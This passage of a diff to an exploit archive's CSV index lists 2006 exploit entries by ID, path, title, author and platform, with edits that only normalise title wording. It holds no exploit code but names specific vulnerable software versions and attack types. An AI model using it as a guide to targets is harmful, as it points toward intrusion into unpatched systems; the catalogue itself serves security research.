Vulnerabilities",2006-06-03,Kacper,php,webapps,0 +1871,platforms/php/webapps/1871.txt,"WebspotBlogging 3.0.1 - (path) Remote File Inclusion",2006-06-03,Kacper,php,webapps,0 +1872,platforms/php/webapps/1872.txt,"CS-Cart 1.3.3 - (classes_dir) Remote File Inclusion",2006-06-03,Kacper,php,webapps,0 +1873,platforms/asp/webapps/1873.txt,"ProPublish 2.0 - (catid) SQL Injection",2006-06-03,FarhadKey,asp,webapps,0 +1874,platforms/php/webapps/1874.php,"LifeType 1.0.4 - SQL Injection / Admin Credentials Disclosure Exploit",2006-06-03,rgod,php,webapps,0 1875,platforms/php/webapps/1875.htm,"FunkBoard CF0.71 - (profile.php) Remote User Pass Change Exploit",2006-06-04,ajann,php,webapps,0 1876,platforms/php/webapps/1876.pl,"SCart 2.0 - (page) Remote Code Execution Exploit",2006-06-04,K-159,php,webapps,0 -1877,platforms/php/webapps/1877.php,"Claroline <= 1.7.6 - (includePath) Remote Code Execution Exploit",2006-06-05,rgod,php,webapps,0 -1878,platforms/php/webapps/1878.txt,"Particle Wiki <= 1.0.2 - Remote SQL Injection",2006-06-05,FarhadKey,php,webapps,0 -1879,platforms/php/webapps/1879.txt,"dotWidget CMS <= 1.0.6 - (file_path) Remote File Include Vulnerabilities",2006-06-05,Aesthetico,php,webapps,0 +1877,platforms/php/webapps/1877.php,"Claroline 1.7.6 - (includePath) Remote Code Execution Exploit",2006-06-05,rgod,php,webapps,0 +1878,platforms/php/webapps/1878.txt,"Particle Wiki 1.0.2 - SQL Injection",2006-06-05,FarhadKey,php,webapps,0 +1879,platforms/php/webapps/1879.txt,"dotWidget CMS 1.0.6 - (file_path) Remote File Inclusion Vulnerabilities",2006-06-05,Aesthetico,php,webapps,0 1880,platforms/linux/dos/1880.c,"Linux Kernel < 2.6.16.18 - (Netfilter NAT SNMP Module) Remote DoS Exploit",2006-06-05,"ECL Labs",linux,dos,0 -1881,platforms/php/webapps/1881.txt,"DreamAccount <= 3.1 - (da_path) Remote File Include Vulnerabilities",2006-06-05,Aesthetico,php,webapps,0 -1882,platforms/php/webapps/1882.pl,"Dmx Forum <= 2.1a (edit.php) Remote Password Disclosure Exploit",2006-06-05,DarkFig,php,webapps,0 -1883,platforms/php/webapps/1883.txt,"Wikiwig <= 4.1 - (wk_lang.php) Remote File Include",2006-06-06,Kacper,php,webapps,0 -1884,platforms/asp/webapps/1884.htm,"myNewsletter <= 1.1.2 - (adminLogin.asp) Login Bypass Exploit",2006-06-06,FarhadKey,asp,webapps,0 +1881,platforms/php/webapps/1881.txt,"DreamAccount 3.1 - (da_path) Remote File Inclusion Vulnerabilities",2006-06-05,Aesthetico,php,webapps,0 +1882,platforms/php/webapps/1882.pl,"Dmx Forum 2.1a (edit.php) Remote Password Disclosure Exploit",2006-06-05,DarkFig,php,webapps,0 +1883,platforms/php/webapps/1883.txt,"Wikiwig 4.1 - (wk_lang.php) Remote File Inclusion",2006-06-06,Kacper,php,webapps,0 +1884,platforms/asp/webapps/1884.htm,"myNewsletter 1.1.2 - (adminLogin.asp) Login Bypass Exploit",2006-06-06,FarhadKey,asp,webapps,0 1885,platforms/windows/remote/1885.pl,"QBik Wingate 6.1.1.1077 - (POST) Remote Buffer Overflow Exploit",2006-06-07,kingcope,windows,remote,80 -1886,platforms/php/webapps/1886.txt,"OpenEMR <= 2.8.1 - (fileroot) Remote File Include",2006-06-07,Kacper,php,webapps,0 -1887,platforms/php/webapps/1887.txt,"Xtreme/Ditto News <= 1.0 - (post.php) Remote File Include",2006-06-07,Kacper,php,webapps,0 -1888,platforms/php/webapps/1888.txt,"Back-End CMS <= 0.7.2.1 - (jpcache.php) Remote Include",2006-06-08,"Federico Fazzi",php,webapps,0 -1889,platforms/hardware/remote/1889.txt,"D-Link Access-Point <= 2.10na - (DWL Series) Config Disclosure",2006-06-08,INTRUDERS,hardware,remote,0 -1890,platforms/php/webapps/1890.txt,"cms-bandits 2.5 - (spaw_root) Remote File Include Vulnerabilities",2006-06-08,"Federico Fazzi",php,webapps,0 -1891,platforms/php/webapps/1891.txt,"Enterprise Payroll Systems <= 1.1 - (footer) Remote Include",2006-06-08,Kacper,php,webapps,0 +1886,platforms/php/webapps/1886.txt,"OpenEMR 2.8.1 - (fileroot) Remote File Inclusion",2006-06-07,Kacper,php,webapps,0 +1887,platforms/php/webapps/1887.txt,"Xtreme/Ditto News 1.0 - (post.php) Remote File Inclusion",2006-06-07,Kacper,php,webapps,0 +1888,platforms/php/webapps/1888.txt,"Back-End CMS 0.7.2.1 - (jpcache.php) Remote Include",2006-06-08,"Federico Fazzi",php,webapps,0 +1889,platforms/hardware/remote/1889.txt,"D-Link Access-Point 2.10na - (DWL Series) Config Disclosure",2006-06-08,INTRUDERS,hardware,remote,0 +1890,platforms/php/webapps/1890.txt,"cms-bandits 2.5 - (spaw_root) Remote File Inclusion Vulnerabilities",2006-06-08,"Federico Fazzi",php,webapps,0 +1891,platforms/php/webapps/1891.txt,"Enterprise Payroll Systems 1.1 - (footer) Remote Include",2006-06-08,Kacper,php,webapps,0 1892,platforms/php/webapps/1892.pl,"Guestex Guestbook 1.00 - (email) Remote Code Execution Exploit",2006-06-08,K-sPecial,php,webapps,0 -1893,platforms/asp/webapps/1893.txt,"MailEnable Enterprise <= 2.0 - (ASP) Multiple Vulnerabilities",2006-06-09,"Soroush Dalili",asp,webapps,0 +1893,platforms/asp/webapps/1893.txt,"MailEnable Enterprise 2.0 - (ASP) Multiple Vulnerabilities",2006-06-09,"Soroush Dalili",asp,webapps,0 1894,platforms/linux/dos/1894.py,"0verkill 0.16 - (ASCII-ART Game) Remote Integer Overflow Crash Exploit",2006-06-09,"Federico Fazzi",linux,dos,0 -1895,platforms/php/webapps/1895.txt,"empris <= r20020923 - (phormationdir) Remote Include",2006-06-10,Kacper,php,webapps,0 -1896,platforms/php/webapps/1896.txt,"aePartner <= 0.8.3 - (dir[data]) Remote Include",2006-06-10,Kacper,php,webapps,0 -1897,platforms/php/webapps/1897.txt,"phpOnDirectory <= 1.0 - Remote File Include Vulnerabilities",2006-06-10,Kacper,php,webapps,0 -1898,platforms/php/webapps/1898.txt,"WebprojectDB <= 0.1.3 - (INCDIR) Remote File Include",2006-06-11,Kacper,php,webapps,0 -1899,platforms/php/webapps/1899.txt,"free QBoard <= 1.1 - (qb_path) Remote File Include",2006-06-11,Kacper,php,webapps,0 -1900,platforms/asp/webapps/1900.txt,"MaxiSepet <= 1.0 - (link) SQL Injection",2006-06-11,nukedx,asp,webapps,0 -1901,platforms/php/webapps/1901.pl,"RCblog <= 1.03 - (post) Remote Command Execution Exploit",2006-06-11,Hessam-x,php,webapps,0 -1902,platforms/php/webapps/1902.txt,"AWF CMS 1.11 - (spaw_root) Remote File Include",2006-06-11,"Federico Fazzi",php,webapps,0 +1895,platforms/php/webapps/1895.txt,"empris r20020923 - (phormationdir) Remote Include",2006-06-10,Kacper,php,webapps,0 +1896,platforms/php/webapps/1896.txt,"aePartner 0.8.3 - (dir[data]) Remote Include",2006-06-10,Kacper,php,webapps,0 +1897,platforms/php/webapps/1897.txt,"phpOnDirectory 1.0 - Remote File Inclusion Vulnerabilities",2006-06-10,Kacper,php,webapps,0 +1898,platforms/php/webapps/1898.txt,"WebprojectDB 0.1.3 - (INCDIR) Remote File Inclusion",2006-06-11,Kacper,php,webapps,0 +1899,platforms/php/webapps/1899.txt,"free QBoard 1.1 - (qb_path) Remote File Inclusion",2006-06-11,Kacper,php,webapps,0 +1900,platforms/asp/webapps/1900.txt,"MaxiSepet 1.0 - (link) SQL Injection",2006-06-11,nukedx,asp,webapps,0 +1901,platforms/php/webapps/1901.pl,"RCblog 1.03 - (post) Remote Command Execution Exploit",2006-06-11,Hessam-x,php,webapps,0 +1902,platforms/php/webapps/1902.txt,"AWF CMS 1.11 - (spaw_root) Remote File Inclusion",2006-06-11,"Federico Fazzi",php,webapps,0 1903,platforms/php/webapps/1903.txt,"Content-Builder (CMS) 0.7.5 - Multiple Include Vulnerabilities",2006-06-11,"Federico Fazzi",php,webapps,0 -1904,platforms/php/webapps/1904.php,"blur6ex <= 0.3.462 - (ID) Admin Disclosure / Blind SQL Injection Exploit",2006-06-12,rgod,php,webapps,0 -1905,platforms/php/webapps/1905.txt,"DCP-Portal 6.1.x - (root) Remote File Include",2006-06-12,"Federico Fazzi",php,webapps,0 +1904,platforms/php/webapps/1904.php,"blur6ex 0.3.462 - (ID) Admin Disclosure / Blind SQL Injection Exploit",2006-06-12,rgod,php,webapps,0 +1905,platforms/php/webapps/1905.txt,"DCP-Portal 6.1.x - (root) Remote File Inclusion",2006-06-12,"Federico Fazzi",php,webapps,0 1906,platforms/windows/remote/1906.py,"CesarFTP 0.99g - (MKD) Remote Buffer Overflow Exploit",2006-06-12,h07,windows,remote,0 -1907,platforms/php/webapps/1907.txt,"aWebNews <= 1.5 - (visview.php) Remote File Include",2006-06-13,SpC-x,php,webapps,0 -1908,platforms/php/webapps/1908.txt,"Minerva <= 2.0.8a Build 237 - (phpbb_root_path) File Include",2006-06-13,Kacper,php,webapps,0 +1907,platforms/php/webapps/1907.txt,"aWebNews 1.5 - (visview.php) Remote File Inclusion",2006-06-13,SpC-x,php,webapps,0 +1908,platforms/php/webapps/1908.txt,"Minerva 2.0.8a Build 237 - (phpbb_root_path) File Include",2006-06-13,Kacper,php,webapps,0 1909,platforms/php/webapps/1909.pl,"MyBulletinBoard (MyBB) < 1.1.3 - Remote Code Execution Exploit",2006-06-13,"Javier Olascoaga",php,webapps,0 1910,platforms/windows/local/1910.c,"Microsoft Windows - (NtClose DeadLock) PoC (MS06-030)",2006-06-14,"Ruben Santamarta ",windows,local,0 1911,platforms/windows/local/1911.c,"Microsoft Windows 2000/XP - (Mrxsmb.sys) Privilege Escalation PoC (MS06-030)",2006-06-14,"Ruben Santamarta ",windows,local,0 -1912,platforms/php/webapps/1912.txt,"The Bible Portal Project <= 2.12 - (destination) File Include",2006-06-14,Kacper,php,webapps,0 -1913,platforms/php/webapps/1913.txt,"Php Blue Dragon CMS <= 2.9.1 - (template.php) File Include",2006-06-14,"Federico Fazzi",php,webapps,0 +1912,platforms/php/webapps/1912.txt,"The Bible Portal Project 2.12 - (destination) File Include",2006-06-14,Kacper,php,webapps,0 +1913,platforms/php/webapps/1913.txt,"Php Blue Dragon CMS 2.9.1 - (template.php) File Include",2006-06-14,"Federico Fazzi",php,webapps,0 1914,platforms/php/webapps/1914.txt,"Content-Builder (CMS) <= 0.7.2 - Multiple Include Vulnerabilities",2006-06-14,Kacper,php,webapps,0 1915,platforms/windows/remote/1915.pm,"CesarFTP 0.99g - (MKD) Remote Buffer Overflow Exploit (Metasploit)",2006-06-15,c0rrupt,windows,remote,0 -1916,platforms/php/webapps/1916.txt,"DeluxeBB <= 1.06 - (templatefolder) Remote File Include Vulnerabilities",2006-06-15,"Andreas Sandblad",php,webapps,0 +1916,platforms/php/webapps/1916.txt,"DeluxeBB 1.06 - (templatefolder) Remote File Inclusion Vulnerabilities",2006-06-15,"Andreas Sandblad",php,webapps,0 1917,platforms/windows/local/1917.pl,"Pico Zip 4.01 - (Long Filename) Buffer Overflow Exploit",2006-06-15,c0rrupt,windows,local,0 -1918,platforms/php/webapps/1918.php,"bitweaver <= 1.3 - (tmpImagePath) Attachment mod_mime Exploit",2006-06-15,rgod,php,webapps,0 -1919,platforms/php/webapps/1919.txt,"CMS Faethon <= 1.3.2 - (mainpath) Remote File Inclusion",2006-06-16,K-159,php,webapps,0 -1920,platforms/php/webapps/1920.php,"Mambo <= 4.6rc1 - (Weblinks) Blind SQL Injection Exploit",2006-06-17,rgod,php,webapps,0 -1921,platforms/php/webapps/1921.pl,"FlashBB <= 1.1.8 - (phpbb_root_path) Remote File Include Exploit",2006-06-17,h4ntu,php,webapps,0 -1922,platforms/php/webapps/1922.php,"Joomla <= 1.0.9 - (Weblinks) Remote Blind SQL Injection Exploit",2006-06-17,rgod,php,webapps,0 -1923,platforms/php/webapps/1923.txt,"Ad Manager Pro 2.6 - (ipath) Remote File Include",2006-06-17,Basti,php,webapps,0 +1918,platforms/php/webapps/1918.php,"bitweaver 1.3 - (tmpImagePath) Attachment mod_mime Exploit",2006-06-15,rgod,php,webapps,0 +1919,platforms/php/webapps/1919.txt,"CMS Faethon 1.3.2 - (mainpath) Remote File Inclusion",2006-06-16,K-159,php,webapps,0 +1920,platforms/php/webapps/1920.php,"Mambo 4.6rc1 - (Weblinks) Blind SQL Injection Exploit",2006-06-17,rgod,php,webapps,0 +1921,platforms/php/webapps/1921.pl,"FlashBB 1.1.8 - (phpbb_root_path) Remote File Inclusion Exploit",2006-06-17,h4ntu,php,webapps,0 +1922,platforms/php/webapps/1922.php,"Joomla 1.0.9 - (Weblinks) Remote Blind SQL Injection Exploit",2006-06-17,rgod,php,webapps,0 +1923,platforms/php/webapps/1923.txt,"Ad Manager Pro 2.6 - (ipath) Remote File Inclusion",2006-06-17,Basti,php,webapps,0 1924,platforms/multiple/local/1924.txt,"Sun iPlanet Messaging Server 5.2 HotFix 1.16 Root Password Disclosure",2006-06-18,php0t,multiple,local,0 -1925,platforms/php/webapps/1925.txt,"INDEXU <= 5.0.1 - (admin_template_path) Remote Include Vulnerabilities",2006-06-18,CrAsh_oVeR_rIdE,php,webapps,0 -1926,platforms/php/webapps/1926.txt,"PHP Live Helper <= 1.x - (abs_path) Remote File Include",2006-06-18,SnIpEr_SA,php,webapps,0 +1925,platforms/php/webapps/1925.txt,"INDEXU 5.0.1 - (admin_template_path) Remote Include Vulnerabilities",2006-06-18,CrAsh_oVeR_rIdE,php,webapps,0 +1926,platforms/php/webapps/1926.txt,"PHP Live Helper 1.x - (abs_path) Remote File Inclusion",2006-06-18,SnIpEr_SA,php,webapps,0 1927,platforms/windows/dos/1927.pl,"Microsoft Excel Unicode Local Overflow Exploit PoC",2006-06-18,kingcope,windows,dos,0 -1928,platforms/php/webapps/1928.txt,"IdeaBox <= 1.1 - (gorumDir) Remote File Include",2006-06-19,Kacper,php,webapps,0 -1929,platforms/php/webapps/1929.txt,"Micro CMS <= 0.3.5 - (microcms_path) Remote File Include",2006-06-19,CeNGiZ-HaN,php,webapps,0 -1930,platforms/asp/webapps/1930.txt,"WeBBoA Host Script 1.1 - Remote SQL Injection",2006-06-19,EntriKa,asp,webapps,0 -1931,platforms/asp/webapps/1931.txt,"ASP Stats Generator <= 2.1.1 - SQL Injection Vulnerabilities",2006-06-19,"Hamid Ebadi",asp,webapps,0 -1932,platforms/php/webapps/1932.php,"Ultimate PHP Board <= 1.96 GOLD - Multiple Vulnerabilities",2006-06-20,"Michael Brooks",php,webapps,0 -1933,platforms/php/webapps/1933.txt,"BandSite CMS <= 1.1.1 - (root_path) Remote File Include Vulnerabilities",2006-06-20,Kw3[R]Ln,php,webapps,0 -1934,platforms/php/webapps/1934.txt,"dotProject <= 2.0.3 - (baseDir) Remote File Inclusion",2006-06-20,h4ntu,php,webapps,0 -1935,platforms/windows/dos/1935.cpp,"Winamp <= 5.21 - (Midi File Header Handling) Buffer Overflow PoC",2006-06-20,BassReFLeX,windows,dos,0 +1928,platforms/php/webapps/1928.txt,"IdeaBox 1.1 - (gorumDir) Remote File Inclusion",2006-06-19,Kacper,php,webapps,0 +1929,platforms/php/webapps/1929.txt,"Micro CMS 0.3.5 - (microcms_path) Remote File Inclusion",2006-06-19,CeNGiZ-HaN,php,webapps,0 +1930,platforms/asp/webapps/1930.txt,"WeBBoA Host Script 1.1 - SQL Injection",2006-06-19,EntriKa,asp,webapps,0 +1931,platforms/asp/webapps/1931.txt,"ASP Stats Generator 2.1.1 - SQL Injection Vulnerabilities",2006-06-19,"Hamid Ebadi",asp,webapps,0 +1932,platforms/php/webapps/1932.php,"Ultimate PHP Board 1.96 GOLD - Multiple Vulnerabilities",2006-06-20,"Michael Brooks",php,webapps,0 +1933,platforms/php/webapps/1933.txt,"BandSite CMS 1.1.1 - (root_path) Remote File Inclusion Vulnerabilities",2006-06-20,Kw3[R]Ln,php,webapps,0 +1934,platforms/php/webapps/1934.txt,"dotProject 2.0.3 - (baseDir) Remote File Inclusion",2006-06-20,h4ntu,php,webapps,0 +1935,platforms/windows/dos/1935.cpp,"Winamp 5.21 - (Midi File Header Handling) Buffer Overflow PoC",2006-06-20,BassReFLeX,windows,dos,0 1936,platforms/php/webapps/1936.txt,"SmartSiteCMS 1.0 - (root) Remote File Inclusion",2006-06-20,Archit3ct,php,webapps,0 1937,platforms/multiple/dos/1937.html,"Opera 9 - (long href) Remote Denial of Service Exploit",2006-06-21,N9,multiple,dos,0 -1938,platforms/php/webapps/1938.pl,"DataLife Engine <= 4.1 - Remote SQL Injection Exploit (perl)",2006-06-21,RusH,php,webapps,0 -1939,platforms/php/webapps/1939.php,"DataLife Engine <= 4.1 - Remote SQL Injection Exploit (PHP)",2006-06-21,RusH,php,webapps,0 +1938,platforms/php/webapps/1938.pl,"DataLife Engine 4.1 - SQL Injection Exploit (perl)",2006-06-21,RusH,php,webapps,0 +1939,platforms/php/webapps/1939.php,"DataLife Engine 4.1 - SQL Injection Exploit (PHP)",2006-06-21,RusH,php,webapps,0 1940,platforms/windows/remote/1940.pm,"Microsoft Windows RRAS - Remote Stack Overflow Exploit (MS06-025) (Metasploit)",2006-06-22,"H D Moore",windows,remote,445 -1941,platforms/php/webapps/1941.php,"Mambo <= 4.6rc1 - (Weblinks) Remote Blind SQL Injection Exploit (2)",2006-06-22,rgod,php,webapps,0 -1942,platforms/php/webapps/1942.txt,"ralf image gallery <= 0.7.4 - Multiple Vulnerabilities",2006-06-22,Aesthetico,php,webapps,0 -1943,platforms/php/webapps/1943.txt,"Harpia CMS <= 1.0.5 - Remote File Include Vulnerabilities",2006-06-22,Kw3[R]Ln,php,webapps,0 +1941,platforms/php/webapps/1941.php,"Mambo 4.6rc1 - (Weblinks) Remote Blind SQL Injection Exploit (2)",2006-06-22,rgod,php,webapps,0 +1942,platforms/php/webapps/1942.txt,"ralf image gallery 0.7.4 - Multiple Vulnerabilities",2006-06-22,Aesthetico,php,webapps,0 +1943,platforms/php/webapps/1943.txt,"Harpia CMS 1.0.5 - Remote File Inclusion Vulnerabilities",2006-06-22,Kw3[R]Ln,php,webapps,0 1944,platforms/windows/local/1944.c,"Microsoft Excel Unspecified Remote Code Execution Exploit",2006-06-22,"naveed afzal",windows,local,0 -1945,platforms/php/webapps/1945.pl,"w-Agora <= 4.2.0 - (inc_dir) Remote File Include Exploit",2006-06-22,the_day,php,webapps,0 -1946,platforms/php/webapps/1946.php,"Jaws <= 0.6.2 - (Search gadget) Remote SQL Injection Exploit",2006-06-23,rgod,php,webapps,0 -1947,platforms/multiple/dos/1947.c,"BitchX <= 1.1-final do_hook() Remote Denial of Service Exploit",2006-06-24,"Federico L. Bossi Bonin",multiple,dos,0 -1948,platforms/php/webapps/1948.txt,"phpMySms 2.0 - (ROOT_PATH) Remote File Include",2006-06-24,Persian-Defacer,php,webapps,0 +1945,platforms/php/webapps/1945.pl,"w-Agora 4.2.0 - (inc_dir) Remote File Inclusion Exploit",2006-06-22,the_day,php,webapps,0 +1946,platforms/php/webapps/1946.php,"Jaws 0.6.2 - (Search gadget) SQL Injection Exploit",2006-06-23,rgod,php,webapps,0 +1947,platforms/multiple/dos/1947.c,"BitchX 1.1-final do_hook() Remote Denial of Service Exploit",2006-06-24,"Federico L. Bossi Bonin",multiple,dos,0 +1948,platforms/php/webapps/1948.txt,"phpMySms 2.0 - (ROOT_PATH) Remote File Inclusion",2006-06-24,Persian-Defacer,php,webapps,0 1949,platforms/windows/dos/1949.pl,"XM Easy Personal FTP Server 5.0.1 - (Port) Remote Overflow PoC",2006-06-24,"Jerome Athias",windows,dos,0 1950,platforms/php/webapps/1950.pl,"MyBulletinBoard (MyBB) <= 1.1.3 - (usercp.php) Create Admin Exploit",2006-06-25,Hessam-x,php,webapps,0 -1951,platforms/php/webapps/1951.txt,"MagNet BeeHive CMS (header) - Remote File Include",2006-06-25,Kw3[R]Ln,php,webapps,0 -1952,platforms/php/webapps/1952.txt,"THoRCMS <= 1.3.1 - (phpbb_root_path) Remote File Include",2006-06-25,Kw3[R]Ln,php,webapps,0 -1953,platforms/php/webapps/1953.pl,"DeluxeBB <= 1.07 - (cp.php) Create Admin Exploit",2006-06-25,Hessam-x,php,webapps,0 -1954,platforms/php/webapps/1954.pl,"DreamAccount <= 3.1 - (auth.api.php) Remote File Include Exploit",2006-06-25,CrAsh_oVeR_rIdE,php,webapps,0 -1955,platforms/php/webapps/1955.txt,"CBSms Mambo Module <= 1.0 - Remote File Include",2006-06-26,Kw3[R]Ln,php,webapps,0 -1956,platforms/php/webapps/1956.txt,"Pearl For Mambo <= 1.6 - Multiple Remote File Include Vulnerabilities",2006-06-27,Kw3[R]Ln,php,webapps,0 -1957,platforms/php/webapps/1957.pl,"Scout Portal Toolkit <= 1.4.0 - (forumid) Remote SQL Injection Exploit",2006-06-27,simo64,php,webapps,0 +1951,platforms/php/webapps/1951.txt,"MagNet BeeHive CMS (header) - Remote File Inclusion",2006-06-25,Kw3[R]Ln,php,webapps,0 +1952,platforms/php/webapps/1952.txt,"THoRCMS 1.3.1 - (phpbb_root_path) Remote File Inclusion",2006-06-25,Kw3[R]Ln,php,webapps,0 +1953,platforms/php/webapps/1953.pl,"DeluxeBB 1.07 - (cp.php) Create Admin Exploit",2006-06-25,Hessam-x,php,webapps,0 +1954,platforms/php/webapps/1954.pl,"DreamAccount 3.1 - (auth.api.php) Remote File Inclusion Exploit",2006-06-25,CrAsh_oVeR_rIdE,php,webapps,0 +1955,platforms/php/webapps/1955.txt,"CBSms Mambo Module 1.0 - Remote File Inclusion",2006-06-26,Kw3[R]Ln,php,webapps,0 +1956,platforms/php/webapps/1956.txt,"Pearl For Mambo 1.6 - Multiple Remote File Inclusion Vulnerabilities",2006-06-27,Kw3[R]Ln,php,webapps,0 +1957,platforms/php/webapps/1957.pl,"Scout Portal Toolkit 1.4.0 - (forumid) SQL Injection Exploit",2006-06-27,simo64,php,webapps,0 1958,platforms/windows/local/1958.pl,"Microsoft Excel 2003 Hlink Stack/SEH Buffer Overflow Exploit",2006-06-27,FistFuXXer,windows,local,0 1959,platforms/php/webapps/1959.txt,"RsGallery2 <= 1.11.2 - (rsgallery.html.php) File Include",2006-06-28,marriottvn,php,webapps,0 -1960,platforms/php/webapps/1960.php,"BLOG:CMS <= 4.0.0k Remote SQL Injection Exploit",2006-06-28,rgod,php,webapps,0 -1961,platforms/php/webapps/1961.txt,"XOOPS myAds Module (lid) Remote SQL Injection",2006-06-28,KeyCoder,php,webapps,0 -1962,platforms/osx/local/1962.pl,"Mac OS X <= 10.4.6 - (launchd) Local Format String Exploit (x86)",2006-06-28,"Kevin Finisterre",osx,local,0 -1963,platforms/php/webapps/1963.txt,"GeekLog <= 1.4.0sr3 - (_CONF[path]) Remote File Include Vulnerabilities",2006-06-29,Kw3[R]Ln,php,webapps,0 -1964,platforms/php/webapps/1964.php,"GeekLog <= 1.4.0sr3 - 'f(u)ckeditor' Remote Code Execution Exploit",2006-06-29,rgod,php,webapps,0 +1960,platforms/php/webapps/1960.php,"BLOG:CMS 4.0.0k SQL Injection Exploit",2006-06-28,rgod,php,webapps,0 +1961,platforms/php/webapps/1961.txt,"XOOPS myAds Module (lid) SQL Injection",2006-06-28,KeyCoder,php,webapps,0 +1962,platforms/osx/local/1962.pl,"Mac OS X 10.4.6 - (launchd) Local Format String Exploit (x86)",2006-06-28,"Kevin Finisterre",osx,local,0 +1963,platforms/php/webapps/1963.txt,"GeekLog 1.4.0sr3 - (_CONF[path]) Remote File Inclusion Vulnerabilities",2006-06-29,Kw3[R]Ln,php,webapps,0 +1964,platforms/php/webapps/1964.php,"GeekLog 1.4.0sr3 - 'f(u)ckeditor' Remote Code Execution Exploit",2006-06-29,rgod,php,webapps,0 1965,platforms/windows/remote/1965.pm,"Microsoft Windows - RRAS RASMAN Registry Stack Overflow Exploit (MS06-025) (Metasploit)",2006-06-29,Pusscat,windows,remote,445 1967,platforms/windows/dos/1967.c,"Microsoft Windows TCP/IP Protocol Driver Remote Buffer Overflow Exploit",2006-06-30,Preddy,windows,dos,0 -1968,platforms/php/webapps/1968.php,"DZCP (deV!L_z Clanportal) <= 1.34 - (id) Remote SQL Injection Exploit",2006-07-01,x128,php,webapps,0 -1969,platforms/php/webapps/1969.txt,"Stud.IP <= 1.3.0-2 - Multiple Remote File Include Vulnerabilities",2006-07-01,"Hamid Ebadi",php,webapps,0 -1970,platforms/php/webapps/1970.txt,"Plume CMS 1.1.3 - (dbinstall.php) Remote File Include",2006-07-01,"Hamid Ebadi",php,webapps,0 -1971,platforms/php/webapps/1971.txt,"Randshop <= 1.1.1 - (header.inc.php) Remote File Include",2006-07-01,OLiBekaS,php,webapps,0 +1968,platforms/php/webapps/1968.php,"DZCP (deV!L_z Clanportal) <= 1.34 - (id) SQL Injection Exploit",2006-07-01,x128,php,webapps,0 +1969,platforms/php/webapps/1969.txt,"Stud.IP 1.3.0-2 - Multiple Remote File Inclusion Vulnerabilities",2006-07-01,"Hamid Ebadi",php,webapps,0 +1970,platforms/php/webapps/1970.txt,"Plume CMS 1.1.3 - (dbinstall.php) Remote File Inclusion",2006-07-01,"Hamid Ebadi",php,webapps,0 +1971,platforms/php/webapps/1971.txt,"Randshop 1.1.1 - (header.inc.php) Remote File Inclusion",2006-07-01,OLiBekaS,php,webapps,0 1972,platforms/multiple/dos/1972.txt,"Opera Web Browser 9.00 - (iframe) Remote Denial of Service Exploit",2006-07-01,y3dips,multiple,dos,0 -1973,platforms/osx/local/1973.pl,"Mac OS X <= 10.4.6 - (launchd) Local Format String Exploit (ppc)",2006-07-01,"Kevin Finisterre",osx,local,0 +1973,platforms/osx/local/1973.pl,"Mac OS X 10.4.6 - (launchd) Local Format String Exploit (ppc)",2006-07-01,"Kevin Finisterre",osx,local,0 1974,platforms/php/webapps/1974.txt,"SmartSiteCMS 1.0 - (root) Multiple Remote File Inclusion Vulnerabilities",2006-07-01,CrAsh_oVeR_rIdE,php,webapps,0 -1975,platforms/php/webapps/1975.pl,"BXCP <= 0.3.0.4 - (where) Remote SQL Injection Exploit",2006-07-02,x23,php,webapps,0 +1975,platforms/php/webapps/1975.pl,"BXCP 0.3.0.4 - (where) SQL Injection Exploit",2006-07-02,x23,php,webapps,0 1976,platforms/windows/dos/1976.cpp,"Quake 3 Engine Client CG_ServerCommand() Remote Overflow Exploit",2006-07-02,RunningBon,windows,dos,0 1977,platforms/windows/dos/1977.cpp,"Quake 3 Engine Client CS_ITEms Remote Overflow Exploit (Win32)",2006-07-02,RunningBon,windows,dos,0 1978,platforms/windows/local/1978.pl,"Microsoft Excel Universal Hlink Local Buffer Overflow Exploit",2006-07-02,"SYS 49152",windows,local,0 -1980,platforms/windows/dos/1980.pl,"ImgSvr <= 0.6.5 - (long http post) Denial of Service Exploit",2006-07-04,n00b,windows,dos,0 -1981,platforms/php/webapps/1981.txt,"galleria Mambo Module <= 1.0b Remote File Include",2006-07-04,sikunYuk,php,webapps,0 -1982,platforms/php/webapps/1982.txt,"WonderEdit Pro CMS (template_path) - Remote File Include Vulnerabilities",2006-07-04,OLiBekaS,php,webapps,0 -1983,platforms/php/webapps/1983.txt,"MyPHP CMS <= 0.3 - (domain) Remote File Include",2006-07-05,Kw3[R]Ln,php,webapps,0 -1984,platforms/windows/dos/1984.py,"WinRAR <= 3.60 beta 6 - (SFX Path) Stack Overflow Exploit PoC",2006-07-05,posidron,windows,dos,0 -1985,platforms/windows/local/1985.py,"WinRAR <= 3.60 beta 6 - (SFX Path) Local Stack Overflow Exploit",2006-07-05,muts,windows,local,0 +1980,platforms/windows/dos/1980.pl,"ImgSvr 0.6.5 - (long http post) Denial of Service Exploit",2006-07-04,n00b,windows,dos,0 +1981,platforms/php/webapps/1981.txt,"galleria Mambo Module 1.0b Remote File Inclusion",2006-07-04,sikunYuk,php,webapps,0 +1982,platforms/php/webapps/1982.txt,"WonderEdit Pro CMS (template_path) - Remote File Inclusion Vulnerabilities",2006-07-04,OLiBekaS,php,webapps,0 +1983,platforms/php/webapps/1983.txt,"MyPHP CMS 0.3 - (domain) Remote File Inclusion",2006-07-05,Kw3[R]Ln,php,webapps,0 +1984,platforms/windows/dos/1984.py,"WinRAR 3.60 beta 6 - (SFX Path) Stack Overflow Exploit PoC",2006-07-05,posidron,windows,dos,0 +1985,platforms/windows/local/1985.py,"WinRAR 3.60 beta 6 - (SFX Path) Local Stack Overflow Exploit",2006-07-05,muts,windows,local,0 1986,platforms/windows/local/1986.cpp,"Microsoft Excel 2000/2003 Hlink Local Buffer Overflow Exploit (french)",2006-07-06,NSRocket,windows,local,0 -1987,platforms/asp/webapps/1987.txt,"Hosting Controller <= 6.1 Hotfix 3.1 - Privilege Escalation",2006-07-06,"Soroush Dalili",asp,webapps,0 +1987,platforms/asp/webapps/1987.txt,"Hosting Controller 6.1 Hotfix 3.1 - Privilege Escalation",2006-07-06,"Soroush Dalili",asp,webapps,0 1988,platforms/windows/local/1988.pl,"Microsoft Excel 2003 Hlink Local Buffer Overflow Exploit (italian)",2006-07-06,oveRet,windows,local,0 1989,platforms/windows/dos/1989.html,"Microsoft Internet Explorer 6 Table.Frameset NULL Dereference",2006-07-07,"Aviv Raff",windows,dos,0 1990,platforms/windows/dos/1990.html,"Microsoft Internet Explorer 6 - (Internet.HHCtrl) Heap Overflow",2006-07-07,"H D Moore",windows,dos,0 -1991,platforms/php/webapps/1991.php,"Pivot <= 1.30 RC2 - Privileges Escalation/Remote Code Execution Exploit",2006-07-07,rgod,php,webapps,0 -1992,platforms/windows/local/1992.py,"WinRAR <= 3.60 beta 6 - (SFX Path) Local Stack Overflow Exploit 